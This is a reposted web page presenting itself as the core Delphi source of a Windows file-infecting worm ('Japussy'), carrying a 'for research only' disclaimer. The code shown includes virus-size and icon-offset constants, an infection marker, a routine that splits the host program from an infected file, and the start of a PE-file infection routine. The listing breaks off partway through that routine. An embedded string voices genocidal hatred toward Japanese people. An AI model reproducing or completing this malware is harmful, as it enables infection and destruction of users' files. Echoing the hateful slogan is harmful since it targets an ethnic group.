小猫烧香 - 核心源码

来源:互联网 发布:异世淘宝女王下载80 编辑:程序博客网 时间:2024/03/29 19:52
 
熊猫烧香 - 核心源码    
--------------------------------------------------------------------------------
僅供研究使用!後果自行負責  
代码:--------------------------------------------------------------------------------
程序代码
program Japussy;
uses
  Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
  HeaderSize = 82432;                  //病毒体的大小
  IconOffset = $12EB8;                 //PE文件主图标的偏移量
  
  //在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
  //查找2800000020的十六进制字符串可以找到主图标的偏移量
    
{
  HeaderSize = 38912;                  //Upx压缩过病毒体的大小
  IconOffset = $92BC;                  //Upx压缩过PE文件主图标的偏移量
  
  //Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
  IconSize   = $2E8;                   //PE文件主图标的大小--744字节
  IconTail   = IconOffset + IconSize;  //PE文件主图标的尾部
  ID         = $44444444;              //感染标记
  
  //垃圾码,以备写入
  Catchword = ’If a race need to be killed out, it must be Yamato. ’ +
              ’If a country need to be destroyed, it must be Japan! ’ +
              ’*** W32.Japussy.Worm.A ***’;
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;  
  stdcall; external ’Kernel32.dll’; //函数声明
var
  TmpFile: string;
  Si:      STARTUPINFO;
  Pi:      PROCESS_INFORMATION;
  IsJap:   Boolean = False; //日文操作系统标记
{ 判断是否为Win9x }
function IsWin9x: Boolean;
var
  Ver: TOSVersionInfo;
begin
  Result := False;
  Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
  if not GetVersionEx(Ver) then
    Exit;
  if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
    Result := True;
end;
{ 在流之间复制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
  dStartPos: Integer; Count: Integer);
var
  sCurPos, dCurPos: Integer;
begin
  sCurPos := Src.Position;
  dCurPos := Dst.Position;
  Src.Seek(sStartPos, 0);
  Dst.Seek(dStartPos, 0);
  Dst.CopyFrom(Src, Count);
  Src.Seek(sCurPos, 0);
  Dst.Seek(dCurPos, 0);
end;
{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }
procedure ExtractFile(FileName: string);
var
  sStream, dStream: TFileStream;
begin
  try
    sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
    try
      dStream := TFileStream.Create(FileName, fmCreate);
      try
        sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
        dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
      finally
        dStream.Free;
      end;
    finally
      sStream.Free;
    end;
  except
  end;
end;
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
  Si.cb := SizeOf(Si);
  Si.lpReserved := nil;
  Si.lpDesktop := nil;
  Si.lpTitle := nil;
  Si.dwFlags := STARTF_USESHOWWINDOW;
  Si.wShowWindow := State;
  Si.cbReserved2 := 0;
  Si.lpReserved2 := nil;
end;
{ 发带毒邮件 }
procedure SendMail;
begin
  //哪位仁兄愿意完成之?
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
var
  HdrStream, SrcStream: TFileStream;
  IcoStream, DstStream: TMemoryStream;
  iID: LongInt;
  aIcon: TIcon;
  Infected, IsPE: Boolean;
  i: Integer;
  Buf: array[0..1] of Char;
begin
  try //出错则文件正在被使用,退出
    if CompareText(FileName, ’JAPUSSY.EXE’) = 0 then //是自己则不感染
      Exit;
    Infected := False;
    IsPE     := False;
    SrcStream := TFileStream.Create(FileName, fmOpenRead);
    try
      for i := 0 to $108 do //检查PE文件头
      begin
        SrcStream.Seek(i, soFromBeginning);
        SrcStream.Read(Buf, 2);
        if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记
        begin
          IsPE := True; //是PE文件
          Break;
        end;
      end;
      SrcStream.Seek(-4, soFromEnd); //检查感染标记
      SrcStream.Read(iID, 4);
      if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染
        Infected := True;
    finally
      SrcStream.Free;
    end;
    if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出
      Exit;
    IcoStream := TMemoryStream.Create;
    DstStream := TMemoryStream.Create;      
原创粉丝点击